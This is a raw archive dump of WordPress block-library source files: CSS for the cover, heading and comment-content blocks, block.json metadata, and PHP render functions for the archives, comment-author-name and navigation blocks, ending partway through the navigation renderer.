.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{
  opacity:.2;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{
  opacity:.3;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{
  opacity:.4;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{
  opacity:.5;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{
  opacity:.6;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{
  opacity:.7;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{
  opacity:.8;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{
  opacity:.9;
}
.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{
  opacity:1;
}
.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{
  max-width:420px;
  width:100%;
}
.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{
  display:flex;
}
.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{
  color:inherit; direction:rtl;
  width:100%;
  z-index:1;
}
.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{
  align-items:flex-start;
  justify-content:flex-start;
}
.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{
  align-items:flex-start;
  justify-content:center;
}
.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{
  align-items:flex-start;
  justify-content:flex-end;
}
.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{
  align-items:center;
  justify-content:flex-start;
}
.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{
  align-items:center;
  justify-content:center;
}
.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{
  align-items:center;
  justify-content:flex-end;
}
.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{
  align-items:flex-end;
  justify-content:flex-start;
}
.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{
  align-items:flex-end;
  justify-content:center;
}
.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{
  align-items:flex-end;
  justify-content:flex-end;
}
.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{
  margin:0;
}
.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{
  margin:0;
  width:auto;
}
.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{
  border:none;
  bottom:0;
  box-shadow:none;
  height:100%;
  left:0;
  margin:0;
  max-height:none;
  max-width:none;
  object-fit:cover;
  outline:none;
  padding:0;
  position:absolute;
  right:0;
  top:0;
  width:100%;
}

.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{
  background-attachment:fixed;
  background-repeat:no-repeat;
  background-size:cover;
}
@supports (-webkit-touch-callout:inherit){
  .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{
    background-attachment:scroll;
  }
}
@media (prefers-reduced-motion:reduce){
  .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{
    background-attachment:scroll;
  }
}
.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{
  background-repeat:repeat;
  background-size:auto;
}

.wp-block-cover__image-background,.wp-block-cover__video-background{
  z-index:0;
}
.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{
  color:#fff;
}

.wp-block-cover-image .wp-block-cover.has-left-content{
  justify-content:flex-start;
}
.wp-block-cover-image .wp-block-cover.has-right-content{
  justify-content:flex-end;
}

.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{
  margin-right:0;
  text-align:right;
}

.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{
  margin-left:0;
  text-align:left;
}

.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{
  font-size:2em;
  line-height:1.25;
  margin-bottom:0;
  max-width:840px;
  padding:.44em;
  text-align:center;
  z-index:1;
}

:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){
  color:#fff;
}

:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){
  color:#000;
}

:root :where(.wp-block-cover h1:not(.has-text-color)),:root :where(.wp-block-cover h2:not(.has-text-color)),:root :where(.wp-block-cover h3:not(.has-text-color)),:root :where(.wp-block-cover h4:not(.has-text-color)),:root :where(.wp-block-cover h5:not(.has-text-color)),:root :where(.wp-block-cover h6:not(.has-text-color)),:root :where(.wp-block-cover p:not(.has-text-color)){
  color:inherit;
}cover/editor-rtl.css000060400000003743151330427370010471 0ustar00.editor-styles-wrapper .wp-block-cover{
  box-sizing:border-box;
}
.wp-block-cover.is-placeholder{
  align-items:stretch;
  display:flex;
  min-height:240px;
  padding:0 !important;
}
.wp-block-cover.is-placeholder .components-placeholder.is-large{
  justify-content:flex-start;
  z-index:1;
}
.wp-block-cover.is-placeholder:focus:after{
  min-height:auto;
}
.wp-block-cover.components-placeholder h2{
  color:inherit;
}
.wp-block-cover.is-transient{
  position:relative;
}
.wp-block-cover.is-transient:before{
  background-color:#fff;
  content:"";
  height:100%;
  opacity:.3;
  position:absolute;
  width:100%;
  z-index:1;
}
.wp-block-cover .components-spinner{
  margin:0;
  position:absolute;
  right:50%;
  top:50%;
  transform:translate(50%, -50%);
  z-index:1;
}
.wp-block-cover .wp-block-cover__inner-container{
  margin-left:0;
  margin-right:0;
  text-align:right;
}
.wp-block-cover .wp-block-cover__placeholder-background-options{
  width:100%;
}
.wp-block-cover .wp-block-cover__image--placeholder-image{
  bottom:0;
  left:0;
  position:absolute;
  right:0;
  top:0;
}

[data-align=left]>.wp-block-cover,[data-align=right]>.wp-block-cover{
  max-width:420px;
  width:100%;
}

.block-library-cover__reset-button{
  margin-right:auto;
}

.block-library-cover__resize-container{
  bottom:0;
  left:0;
  min-height:50px;
  position:absolute !important;
  right:0;
  top:0;
}

.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .block-library-cover__resize-container,.components-popover.block-editor-block-popover.block-library-cover__resizable-box-popover .components-popover__content>div{
  overflow:visible;
  pointer-events:none;
}

.wp-block-cover>.components-drop-zone .components-drop-zone__content{
  opacity:.8 !important;
}

.block-editor-block-patterns-list__list-item .has-parallax.wp-block-cover{
  background-attachment:scroll;
}

.color-block-support-panel__inner-wrapper>:not(.block-editor-tools-panel-color-gradient-settings__item){
  margin-top:24px;
}archives.php000060400000005662151330427370007073 0ustar00<?php
/**
 * Server-side rendering of the `core/archives` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/archives` block on server.
 *
 * @since 5.0.0
 *
 * @see WP_Widget_Archives
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the post content with archives added.
 */
function render_block_core_archives( $attributes ) {
	$show_post_count = ! empty( $attributes['showPostCounts'] );
	$type            = isset( $attributes['type'] ) ? $attributes['type'] : 'monthly';

	$class = 'wp-block-archives-list';

	if ( ! empty( $attributes['displayAsDropdown'] ) ) {

		$class = 'wp-block-archives-dropdown';

		$dropdown_id = wp_unique_id( 'wp-block-archives-' );
		$title       = __( 'Archives' );

		/** This filter is documented in wp-includes/widgets/class-wp-widget-archives.php */
		$dropdown_args = apply_filters(
			'widget_archives_dropdown_args',
			array(
				'type'            => $type,
				'format'          => 'option',
				'show_post_count' => $show_post_count,
			)
		);

		$dropdown_args['echo'] = 0;

		$archives = wp_get_archives( $dropdown_args );

		$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $class ) );

		switch ( $dropdown_args['type'] ) {
			case 'yearly':
				$label = __( 'Select Year' );
				break;
			case 'monthly':
				$label = __( 'Select Month' );
				break;
			case 'daily':
				$label = __( 'Select Day' );
				break;
			case 'weekly':
				$label = __( 'Select Week' );
				break;
			default:
				$label = __( 'Select Post' );
				break;
		}

		$show_label = empty( $attributes['showLabel'] ) ? ' screen-reader-text' : '';

		$block_content = '<label for="' . $dropdown_id . '" class="wp-block-archives__label' . $show_label . '">' . esc_html( $title ) . '</label>
		<select id="' . $dropdown_id . '" name="archive-dropdown" onchange="document.location.href=this.options[this.selectedIndex].value;">
		<option value="">' . esc_html( $label ) . '</option>' . $archives . '</select>';

		return sprintf(
			'<div %1$s>%2$s</div>',
			$wrapper_attributes,
			$block_content
		);
	}

	/** This filter is documented in wp-includes/widgets/class-wp-widget-archives.php */
	$archives_args = apply_filters(
		'widget_archives_args',
		array(
			'type'            => $type,
			'show_post_count' => $show_post_count,
		)
	);

	$archives_args['echo'] = 0;

	$archives = wp_get_archives( $archives_args );

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $class ) );

	if ( empty( $archives ) ) {
		return sprintf(
			'<div %1$s>%2$s</div>',
			$wrapper_attributes,
			__( 'No archives to show.' )
		);
	}

	return sprintf(
		'<ul %1$s>%2$s</ul>',
		$wrapper_attributes,
		$archives
	);
}

/**
 * Register archives block.
 *
 * @since 5.0.0
 */
function register_block_core_archives() {
	register_block_type_from_metadata(
		__DIR__ . '/archives',
		array(
			'render_callback' => 'render_block_core_archives',
		)
	);
}
add_action( 'init', 'register_block_core_archives' );
comment-content/style-rtl.css000060400000000127151330427370012330 0ustar00.comment-awaiting-moderation{
  display:block;
  font-size:.875em;
  line-height:1.5;
}comment-content/style-rtl.min.css000060400000000114151330427370013106 0ustar00.comment-awaiting-moderation{display:block;font-size:.875em;line-height:1.5}comment-content/style.css000060400000000127151330427370011531 0ustar00.comment-awaiting-moderation{
  display:block;
  font-size:.875em;
  line-height:1.5;
}comment-content/block.json000060400000002023151330427370011641 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comment-content",
	"title": "Comment Content",
	"category": "theme",
	"ancestor": [ "core/comment-template" ],
	"description": "Displays the contents of a comment.",
	"textdomain": "default",
	"usesContext": [ "commentId" ],
	"attributes": {
		"textAlign": {
			"type": "string"
		}
	},
	"supports": {
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"spacing": {
			"padding": [ "horizontal", "vertical" ],
			"__experimentalDefaultControls": {
				"padding": true
			}
		},
		"html": false
	}
}
comment-content/style.min.css000060400000000114151330427370012307 0ustar00.comment-awaiting-moderation{display:block;font-size:.875em;line-height:1.5}heading/style.css000060400000002002151330427370010010 0ustar00h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{
  padding:1.25em 2.375em;
}
h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){
  rotate:180deg;
}heading/style-rtl.css000060400000002002151330427370010607 0ustar00h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{
  padding:1.25em 2.375em;
}
h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){
  rotate:180deg;
}heading/block.json000060400000003161151330427370010132 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/heading",
	"title": "Heading",
	"category": "text",
	"description": "Introduce new sections and organize content to help visitors (and search engines) understand the structure of your content.",
	"keywords": [ "title", "subtitle" ],
	"textdomain": "default",
	"attributes": {
		"textAlign": {
			"type": "string"
		},
		"content": {
			"type": "rich-text",
			"source": "rich-text",
			"selector": "h1,h2,h3,h4,h5,h6",
			"__experimentalRole": "content"
		},
		"level": {
			"type": "number",
			"default": 2
		},
		"placeholder": {
			"type": "string"
		}
	},
	"supports": {
		"align": [ "wide", "full" ],
		"anchor": true,
		"className": true,
		"splitting": true,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontStyle": true,
			"__experimentalFontWeight": true,
			"__experimentalLetterSpacing": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalWritingMode": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"__unstablePasteTextInline": true,
		"__experimentalSlashInserter": true,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-heading-editor",
	"style": "wp-block-heading"
}
heading/style.min.css000060400000001767151330427370010613 0ustar00h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}heading/style-rtl.min.css000060400000001767151330427370011412 0ustar00h1.has-background,h2.has-background,h3.has-background,h4.has-background,h5.has-background,h6.has-background{padding:1.25em 2.375em}h1.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h3.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h3.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h4.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h6.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h6.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]){rotate:180deg}comment-author-name.php000060400000004125151330427370011140 0ustar00<?php
/**
 * Server-side rendering of the `core/comment-author-name` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/comment-author-name` block on the server.
 *
 * @since 6.0.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Return the post comment's author.
 */
function render_block_core_comment_author_name( $attributes, $content, $block ) {
	if ( ! isset( $block->context['commentId'] ) ) {
		return '';
	}

	$comment            = get_comment( $block->context['commentId'] );
	$commenter          = wp_get_current_commenter();
	$show_pending_links = isset( $commenter['comment_author'] ) && $commenter['comment_author'];
	if ( empty( $comment ) ) {
		return '';
	}

	$classes = array();
	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );
	$comment_author     = get_comment_author( $comment );
	$link               = get_comment_author_url( $comment );

	if ( ! empty( $link ) && ! empty( $attributes['isLink'] ) && ! empty( $attributes['linkTarget'] ) ) {
		$comment_author = sprintf( '<a rel="external nofollow ugc" href="%1s" target="%2s" >%3s</a>', esc_url( $link ), esc_attr( $attributes['linkTarget'] ), $comment_author );
	}
	if ( '0' === $comment->comment_approved && ! $show_pending_links ) {
		$comment_author = wp_kses( $comment_author, array() );
	}

	return sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$comment_author
	);
}

/**
 * Registers the `core/comment-author-name` block on the server.
 *
 * @since 6.0.0
 */
function register_block_core_comment_author_name() {
	register_block_type_from_metadata(
		__DIR__ . '/comment-author-name',
		array(
			'render_callback' => 'render_block_core_comment_author_name',
		)
	);
}
add_action( 'init', 'register_block_core_comment_author_name' );
navigation.php000060400000166415151330427370007432 0ustar00<?php
/**
 * Server-side rendering of the `core/navigation` block.
 *
 * @package WordPress
 */

/**
 * Helper functions used to render the navigation block.
 *
 * @since 6.5.0
 */
class WP_Navigation_Block_Renderer {

	/**
	 * Used to determine whether or not a navigation has submenus.
	 *
	 * @since 6.5.0
	 */
	private static $has_submenus = false;

	/**
	 * Used to determine which blocks need an <li> wrapper.
	 *
	 * @since 6.5.0
	 *
	 * @var array
	 */
	private static $needs_list_item_wrapper = array(
		'core/site-title',
		'core/site-logo',
		'core/social-links',
	);

	/**
	 * Keeps track of all the navigation names that have been seen.
	 *
	 * @since 6.5.0
	 *
	 * @var array
	 */
	private static $seen_menu_names = array();

	/**
	 * Returns whether or not this is responsive navigation.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return bool Returns whether or not this is responsive navigation.
	 */
	private static function is_responsive( $attributes ) {
		/**
		 * This is for backwards compatibility after the `isResponsive` attribute was been removed.
		 */

		$has_old_responsive_attribute = ! empty( $attributes['isResponsive'] ) && $attributes['isResponsive'];
		return isset( $attributes['overlayMenu'] ) && 'never' !== $attributes['overlayMenu'] || $has_old_responsive_attribute;
	}

	/**
	 * Returns whether or not a navigation has a submenu.
	 *
	 * @since 6.5.0
	 *
	 * @param WP_Block_List $inner_blocks The list of inner blocks.
	 * @return bool Returns whether or not a navigation has a submenu and also sets the member variable.
	 */
	private static function has_submenus( $inner_blocks ) {
		if ( true === static::$has_submenus ) {
			return static::$has_submenus;
		}

		foreach ( $inner_blocks as $inner_block ) {
			// If this is a page list then work out if any of the pages have children.
			if ( 'core/page-list' === $inner_block->name ) {
				$all_pages = get_pages(
					array(
						'sort_column' => 'menu_order,post_title',
						'order'       => 'asc',
					)
				);
				foreach ( (array) $all_pages as $page ) {
					if ( $page->post_parent ) {
						static::$has_submenus = true;
						break;
					}
				}
			}
			// If this is a navigation submenu then we know we have submenus.
			if ( 'core/navigation-submenu' === $inner_block->name ) {
				static::$has_submenus = true;
				break;
			}
		}

		return static::$has_submenus;
	}

	/**
	 * Determine whether the navigation blocks is interactive.
	 *
	 * @since 6.5.0
	 *
	 * @param array         $attributes   The block attributes.
	 * @param WP_Block_List $inner_blocks The list of inner blocks.
	 * @return bool Returns whether or not to load the view script.
	 */
	private static function is_interactive( $attributes, $inner_blocks ) {
		$has_submenus       = static::has_submenus( $inner_blocks );
		$is_responsive_menu = static::is_responsive( $attributes );
		return ( $has_submenus && ( $attributes['openSubmenusOnClick'] || $attributes['showSubmenuIcon'] ) ) || $is_responsive_menu;
	}

	/**
	 * Returns whether or not a block needs a list item wrapper.
	 *
	 * @since 6.5.0
	 *
	 * @param WP_Block $block The block.
	 * @return bool Returns whether or not a block needs a list item wrapper.
	 */
	private static function does_block_need_a_list_item_wrapper( $block ) {

		/**
		 * Filter the list of blocks that need a list item wrapper.
		 *
		 * Affords the ability to customize which blocks need a list item wrapper when rendered
		 * within a core/navigation block.
		 * This is useful for blocks that are not list items but should be wrapped in a list
		 * item when used as a child of a navigation block.
		 *
		 * @since 6.5.0
		 *
		 * @param array $needs_list_item_wrapper The list of blocks that need a list item wrapper.
		 * @return array The list of blocks that need a list item wrapper.
		 */
		$needs_list_item_wrapper = apply_filters( 'block_core_navigation_listable_blocks', static::$needs_list_item_wrapper );

		return in_array( $block->name, $needs_list_item_wrapper, true );
	}

	/**
	 * Returns the markup for a single inner block.
	 *
	 * @since 6.5.0
	 *
	 * @param WP_Block $inner_block The inner block.
	 * @return string Returns the markup for a single inner block.
	 */
	private static function get_markup_for_inner_block( $inner_block ) {
		$inner_block_content = $inner_block->render();
		if ( ! empty( $inner_block_content ) ) {
			if ( static::does_block_need_a_list_item_wrapper( $inner_block ) ) {
				return '<li class="wp-block-navigation-item">' . $inner_block_content . '</li>';
			}
		}

		return $inner_block_content;
	}

	/**
	 * Returns the html for the inner blocks of the navigation block.
	 *
	 * @since 6.5.0
	 *
	 * @param array         $attributes   The block attributes.
	 * @param WP_Block_List $inner_blocks The list of inner blocks.
	 * @return string Returns the html for the inner blocks of the navigation block.
	 */
	private static function get_inner_blocks_html( $attributes, $inner_blocks ) {
		$has_submenus   = static::has_submenus( $inner_blocks );
		$is_interactive = static::is_interactive( $attributes, $inner_blocks );

		$style                = static::get_styles( $attributes );
		$class                = static::get_classes( $attributes );
		$container_attributes = get_block_wrapper_attributes(
			array(
				'class' => 'wp-block-navigation__container ' . $class,
				'style' => $style,
			)
		);

		$inner_blocks_html = '';
		$is_list_open      = false;

		foreach ( $inner_blocks as $inner_block ) {
			$inner_block_markup = static::get_markup_for_inner_block( $inner_block );
			$p                  = new WP_HTML_Tag_Processor( $inner_block_markup );
			$is_list_item       = $p->next_tag( 'LI' );

			if ( $is_list_item && ! $is_list_open ) {
				$is_list_open       = true;
				$inner_blocks_html .= sprintf(
					'<ul %1$s>',
					$container_attributes
				);
			}

			if ( ! $is_list_item && $is_list_open ) {
				$is_list_open       = false;
				$inner_blocks_html .= '</ul>';
			}

			$inner_blocks_html .= $inner_block_markup;
		}

		if ( $is_list_open ) {
			$inner_blocks_html .= '</ul>';
		}

		// Add directives to the submenu if needed.
		if ( $has_submenus && $is_interactive ) {
			$tags              = new WP_HTML_Tag_Processor( $inner_blocks_html );
			$inner_blocks_html = block_core_navigation_add_directives_to_submenu( $tags, $attributes );
		}

		return $inner_blocks_html;
	}

	/**
	 * Gets the inner blocks for the navigation block from the navigation post.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return WP_Block_List Returns the inner blocks for the navigation block.
	 */
	private static function get_inner_blocks_from_navigation_post( $attributes ) {
		$navigation_post = get_post( $attributes['ref'] );
		if ( ! isset( $navigation_post ) ) {
			return new WP_Block_List( array(), $attributes );
		}

		// Only published posts are valid. If this is changed then a corresponding change
		// must also be implemented in `use-navigation-menu.js`.
		if ( 'publish' === $navigation_post->post_status ) {
			$parsed_blocks = parse_blocks( $navigation_post->post_content );

			// 'parse_blocks' includes a null block with '\n\n' as the content when
			// it encounters whitespace. This code strips it.
			$blocks = block_core_navigation_filter_out_empty_blocks( $parsed_blocks );

			if ( function_exists( 'set_ignored_hooked_blocks_metadata' ) ) {
				// Run Block Hooks algorithm to inject hooked blocks.
				$markup         = block_core_navigation_insert_hooked_blocks( $blocks, $navigation_post );
				$root_nav_block = parse_blocks( $markup )[0];

				$blocks = isset( $root_nav_block['innerBlocks'] ) ? $root_nav_block['innerBlocks'] : $blocks;
			}

			// TODO - this uses the full navigation block attributes for the
			// context which could be refined.
			return new WP_Block_List( $blocks, $attributes );
		}
	}

	/**
	 * Gets the inner blocks for the navigation block from the fallback.
	 *
	 * @since 6.5.0
	 *
	 * @param array $attributes The block attributes.
	 * @return WP_Block_List Returns the inner blocks for the navigation block.
	 */
	private static function get_inner_blocks_from_fallback( $attributes ) {
		$fallback_blocks = block_core_navigation_get_fallback_blocks();

		// Fallback my have been filtered so do basic test for validity.
		if ( empty( $fallback_blocks ) || ! is_array( $fallback_blocks ) ) {
			return new WP_Block_List( array(), $attributes );
		}

		return new WP_Block_List( $fallback_blocks, $attributes );
	}

	/**
	 * Gets the inner blocks for the navigation block.
	 *
	 * @since 6.5.0
